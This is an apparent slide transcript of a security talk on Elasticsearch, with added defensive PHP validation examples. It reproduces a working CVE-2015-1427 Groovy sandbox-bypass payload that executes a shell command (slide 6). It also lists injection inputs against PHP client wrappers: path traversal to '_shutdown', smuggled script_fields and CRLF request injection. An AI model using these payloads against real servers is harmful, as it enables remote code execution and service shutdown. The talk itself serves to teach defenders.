dcm#8 elastic search
TRANSCRIPT
Slide 1
ElasticSearch: Is it secure?
@d0znpp, Wallarm research
Slide 2
What is ElasticSearch?
"Elasticsearch is a distributed RESTful search engine built for the cloud."
Official repo: https://github.com/elastic/elasticsearch
Distributed Lucene instances broker
● RESTful API
● Native Java API
Clients: https://www.elastic.co/guide/index.html
Slide 3
Previous works
● NoSQL Injection for Elasticsearch (Kindle Edition) by Gary Drocella http://goo.gl/OnfMOz => ACL to 9200 and 9300
● NoSQL Injections: Moving Beyond 'or '1'='1', Matt Bromiley, Derbycon 2014 http://goo.gl/UBh42h => do not produce JSON by string concatenation
● Securing ElasticSearch http://goo.gl/Ik3023 => use Nginx to provide BasicAuth, and other advice
Slide 4 (image only)
Slide 5
Previous bugs: 5 CVEs
https://www.elastic.co/community/security
● CVE-2015-4165 is not disclosed yet ;( "All Elasticsearch versions from 1.0.0 to 1.5.2 are vulnerable to an attack that uses Elasticsearch to modify files read and executed by certain other applications."
● CVE-2015-3337 path traversal https://goo.gl/YWwu3a
● CVE-2015-1427 Groovy RCE https://goo.gl/Bi9SfC
● CVE-2014-6439 CORS issue https://goo.gl/7kMxod
● CVE-2014-3120 Java RCE https://goo.gl/iZL5L8
Slide 6
Sandbox bypass (CVE-2015-1427)
{
  "size": 1,
  "script_fields": {
    "lupin": {
      "script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"id\").getText()"
    }
  }
}
Slide 7
What is my point? Bug bounty
https://research.facebook.com/search?q=a%20 -> 200
https://research.facebook.com/search?q=a%22 -> 500
$1000 reward for an injection into the JSON sent to ElasticSearch
But it might be RCE...
Slide 8
What is my point?
● Want to hack it through web applications
● Because it is a really rare case when ES is present at the network perimeter
● To check wrappers for different platforms for input validation attacks
● Yes, the same as with Memcached injections https://goo.gl/9qV620 [BHUS-14]
Slide 9
4 popular clients (wrappers)
http://jolicode.com/blog/elasticsearch-php-clients-test-drive
● Original (elasticsearch)
● Sherlock
● Elastica
● Nervetattoo
Let's start from PHP
Slides 10-11
Input validation kinds
● RESTful tricks (when user data is in the URL: ../ et al.)
● JSON syntax breakers ( \ " } { ] [ )
● Native Java API <- only about RESTful clients now
● Filename tricks (each index is a folder with the same name). I suggest this is the CVE-2015-4165 vector ;) <- ES internals, not clients
Slide 12
elasticsearch original
● All URI parts go through PHP urlencode(). But dot (0x2e) IS NOT encoded, per RFC
● json_encode protects from injections into values
$params = array();
$params['body'] = array('testField' => 'abc');
$params['index'] = '..';
$params['type'] = '_shutdown';
// Document will be indexed to my_index/my_type/<autogenerated_id>
// (comment kept from the client's docs sample; with the values above the
// request path becomes /../_shutdown instead of /my_index/my_type)
$ret = $client->index($params);
Slide 13
nervetattoo
● URI parts "as is"
● json_encode protects from injections into values
$results = $es
    ->setIndex("what/../do/you/want!/")
    ->setType("and/../here/also!")
    ->search('title:cool&key=value&script_fields'); // CVE
Slide 14
nervetattoo
But it's a raw socket, baby!
$results = $es
    ->setIndex(" HTTP/1.1\r\n…\"script\":\"...\"") // CVE
    ->setType("my_type")
    ->search('title:cool');
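Slides 12 to 14 show one gap from three angles: the index and type names reach the request path (or, with nervetattoo, the raw socket) without any validation, and urlencode() cannot help because "." is unreserved. The following PHP is an added example, not code from the talk or from any of the four clients; the helper names isSafeEsName() and buildDocPath() and the sample inputs are my own. It whitelists both names before a path is assembled, which rejects "..", the "_" prefix reserved for API endpoints, slashes, query metacharacters and CR/LF in one place.

```php
<?php
// Added example (not from the slides or from elasticsearch-php / nervetattoo):
// validate index and type names before they reach a client. rawurlencode()
// leaves '.' untouched, so ".." would otherwise survive into the request path.

/**
 * Returns true when $name is safe to use as an Elasticsearch index or type
 * segment: 1 to 255 bytes, lowercase, not "." or "..", not starting with "_"
 * (the prefix used by API endpoints such as _shutdown and _search), and made
 * only of [a-z0-9_.-]. The whitelist also rejects '/', '\', '?', '&', '#',
 * '"', spaces and \r\n, i.e. the URI, query-string and raw-socket tricks above.
 */
function isSafeEsName(string $name): bool
{
    if ($name === '' || strlen($name) > 255) {
        return false;
    }
    if ($name === '.' || $name === '..' || $name[0] === '_') {
        return false;
    }
    return preg_match('/\A[a-z0-9][a-z0-9_.-]*\z/', $name) === 1;
}

/**
 * Builds the document path "/{index}/{type}" only from validated segments and
 * throws on bad input instead of letting the client assemble an unexpected URL.
 */
function buildDocPath(string $index, string $type): string
{
    foreach (['index' => $index, 'type' => $type] as $what => $value) {
        if (!isSafeEsName($value)) {
            throw new InvalidArgumentException("Unsafe Elasticsearch $what name");
        }
    }
    return '/' . rawurlencode($index) . '/' . rawurlencode($type);
}

// Constructed inputs: a legitimate pair plus the three shapes from the slides.
$attempts = [
    ['my_index', 'my_type'],
    ['..', '_shutdown'],
    ['what/../do/you/want!/', 'and/../here/also!'],
    ["a HTTP/1.1\r\nX: y", 'my_type'],
];
foreach ($attempts as [$index, $type]) {
    // What rawurlencode() alone would produce (note that ".." passes through unchanged).
    $encodedOnly = '/' . rawurlencode($index) . '/' . rawurlencode($type);
    try {
        $safe = buildDocPath($index, $type);
        printf("ACCEPTED %-45s -> %s\n", json_encode($index . ' / ' . $type), $safe);
    } catch (InvalidArgumentException $e) {
        printf("REJECTED %-45s (encoding alone would give %s)\n",
            json_encode($index . ' / ' . $type), $encodedOnly);
    }
}
```

Run it with `php validate_names.php` (PHP 7.1 or later for the list destructuring in foreach). The important design choice is that the check is a whitelist applied in application code, before the wrapper: the conclusions slide says index name and type are not for users, and when they must be derived from user input this is where the derivation gets pinned to the characters Elasticsearch itself accepts.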
Slide 15
Conclusions
● Use DSL methods
● Index name and type are not for users
● Do not concatenate strings to JSON
● Always filter data before putting it into wrappers
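For "do not concatenate strings to JSON" and the q=a%22 -> 500 case from the bug-bounty slide, the following PHP is an added example, not code from the talk or from any client library; the helper names and sample inputs are my own. It puts a concatenated body next to one built from arrays and json_encode(), checks which of the two stays valid JSON for each input, and shows the escaping needed if Lucene query_string syntax really has to be exposed.

```php
<?php
// Added example (not from the slides): let json_encode() do the quoting instead
// of concatenating user input into a JSON string. Requires PHP 7.3+ for
// JSON_THROW_ON_ERROR.

/**
 * The pattern the talk warns against: a quote in $q closes the JSON string early,
 * which is what the 'q=a%22' request in the bug-bounty slide triggered (HTTP 500).
 */
function unsafeSearchBody(string $q): string
{
    return '{"query":{"query_string":{"query":"' . $q . '"}}}';
}

/**
 * Safe variant: json_encode() escapes quotes, backslashes and control characters,
 * and a "match" query treats the text as plain terms, so Lucene operators typed
 * by a user (field:value, wildcards, ranges) are not interpreted.
 */
function safeSearchBody(string $q, int $size = 10): string
{
    $body = [
        'size'  => $size,
        'query' => ['match' => ['title' => $q]],
    ];
    return json_encode($body, JSON_THROW_ON_ERROR | JSON_UNESCAPED_SLASHES);
}

/**
 * Only if query_string syntax is really wanted: backslash-escape the characters
 * Lucene treats as operators and drop '<' and '>', which cannot be escaped at all.
 */
function escapeQueryString(string $q): string
{
    $q = str_replace(['<', '>'], '', $q);
    return preg_replace('/([+\-=!(){}\[\]^"~*?:\\\\\/]|&&|\|\|)/', '\\\\$1', $q);
}

function isValidJson(string $json): bool
{
    json_decode($json);
    return json_last_error() === JSON_ERROR_NONE;
}

// Constructed inputs: the two from the bug-bounty slide and one with Lucene syntax.
foreach (['a', 'a"', 'title:cool'] as $q) {
    printf("input %-14s concatenated body valid: %-3s  array+json_encode valid: %s\n",
        json_encode($q),
        isValidJson(unsafeSearchBody($q)) ? 'yes' : 'no',
        isValidJson(safeSearchBody($q)) ? 'yes' : 'no');
}
// 'title:cool' is valid JSON either way; the difference is whether ES reads it as
// a field query (query_string) or as two words in the title field (match).
echo "escaped for query_string: ", escapeQueryString('title:cool'), "\n";
```

Run it with `php search_body.php`. The body is a PHP array right up to the moment it is serialized, so the separation between structure (keys chosen by the application) and data (values supplied by the user) is kept by the encoder rather than by anything the developer has to remember per call; this is the same property the "use DSL methods" conclusion gives you with the clients' own query builders.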
Slide 16
https://twitter.com/d0znpp
blog.wallarm.com
Thx!